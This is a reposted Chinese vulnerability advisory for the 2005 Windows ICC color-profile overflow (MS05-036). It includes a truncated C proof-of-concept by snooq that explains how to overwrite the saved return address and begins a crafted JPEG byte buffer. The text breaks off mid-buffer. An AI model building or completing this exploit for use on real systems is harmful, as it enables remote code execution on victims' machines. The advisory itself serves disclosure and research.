Microsoft Windows颜色管理模块ICC配置文件溢出…

2008-04-09 04:18:16来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Microsoft Windows颜色管理模块ICC配置文件溢出漏洞(MS05-036)

发布日期:2005-07-13
更新日期:2005-07-13

受影响系统:
Microsoft Windows XP SP2
Microsoft Windows XP SP1
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4
描述:
BUGTRAQ ID: 14214
CVE(CAN) ID: CVE-2005-1219

Microsoft Windows是微软发布的非常流行的操作系统。

Microsoft颜色管理模块中存在远程代码执行漏洞,成功利用这个漏洞的攻击者可以完全控制受影响的系统.

起因是它处理ICC配置文件格式标签验证时存在溢出。攻击者可以通过创建恶意的图形文件来利用这个漏洞。如果用户访问了恶意的Web站点或浏览了恶意邮件消息的话,该文件就能导致远程执行代码。

<*来源:Shih-hao Weng
snooq (jinyean@hotmail.com)

链接:http://www.microsoft.com/technet/security/Bulletin/MS05-036.mspx
http://www.us-cert.gov/cas/techalerts/TA05-193A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*
* Author: snooq [http://www.redpuffer.net/snooq/web/]
* Date: 21 July 2005
*
* When I looked at the PoC posted on bugtraq....
* I was basically quite disappointed. The 'PoC' fixed
* 'tag count' to a large number.. but this code path
* does not seem to be exploitable... GetColorProfileElement
* crashes becoz it hits the page boundary while enumerating
* the tags...this simply triggers 'Access Violation' before
* we even overwrite anything in the memory...
*
* well.. at least that is what I see in SoftICE... tell me if
* it's wrong...
*
* anyway.. I decided to dig deeper...and I was lucky enuff
* to uncover a more promising path...
*
* by controlling the size field of 'redMatrixColumnTag'...
* we are able to trick 'GetColorProfileElement' to overwrite
* the stack content...
*
* the offending code looks like this:
*
* .text:73B32144 mov esi, eax
* .text:73B32146 mov eax, ecx
* .text:73B32148 shr ecx, 2
* .text:73B3214B rep movsd
* .text:73B3214D mov ecx, eax
* .text:73B3214F and ecx, 3
* .text:73B32152 rep movsb
* .text:73B32154 mov ecx, [ebp lp]
* .text:73B32157 mov [ecx], eax
*
* ESI points to 'redMatrixColumnTag' data
* EDI points to a buffer on the stack
* ECX is what we can control (the size field)
*
* At 73B3214B, it will overflow to the adjacent stack frames
* if ECX is large enuff. As a result, we are able to overwrite
* the saved EIP value of icm32.671123E7...
*
* the onli prob now.. is I hav not found a reliable
* 'jmp' address... or perhaps.. try SEH trick instead??
*
* please tell me about it if u have a more reliable way of
* exploiting this... while I am heading to my bed now.
*
* nonethelss.. this should be good enuff to reproduce the
* bug.. enjoy!
*
* Greetz:
* =======
* - sk, ck, eugene, nam, jeff, ken, andre, sugi..etc
* - julian and chris from thinkSECURE
*/

#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

#define TARGET 1
#define NOP 0x90
#define FNAME "snooq.jpg"
#define BSIZE sizeof(buff)-1
#define EIP_OFFSET 0x336
#define SC_OFFSET 0x246
#define NOP_OFFSET 0x218
#define NOP_SIZE 0x112

/*
* Silly JPEG stuffed with ICC profile.........
*/

char buff[]="\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x00\x01\x00\x60"
"\x00\x60\x00\x00\xFF\xE2\x0C\x58\x49\x43\x43\x5F\x50\x52\x4F\x46"
"\x49\x4C\x45\x00\x01\x01\x00\x00\x0C\x48\x4C\x69\x6E\x6F\x02\x10"
"\x00\x00\x6D\x6E\x74\x72\x52\x47\x42\x20\x58\x59\x5A\x20\x07\xCE"
"\x00\x02\x00\x09\x00\x06\x00\x31\x00\x00\x61\x63\x73\x70\x4D\x53"
"\x46\x54\x00\x00\x00\x00\x49\x45\x43\x20\x73\x52\x47\x42\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF6\xD6\x00\x01"
"\x00\x00\x00\x00\xD3\x2D\x48\x50\x20\x20\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x63\x70\x72\x74\x00\x00"
"\x01\x50\x00\x00\x00\x33\x64\x65\x73\x63\x00\x00\x01\x84\x00\x00"

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft Word畸形文档字体处理溢出漏洞(MS05-035)

下一篇:SquirrelMail未明变量处理漏洞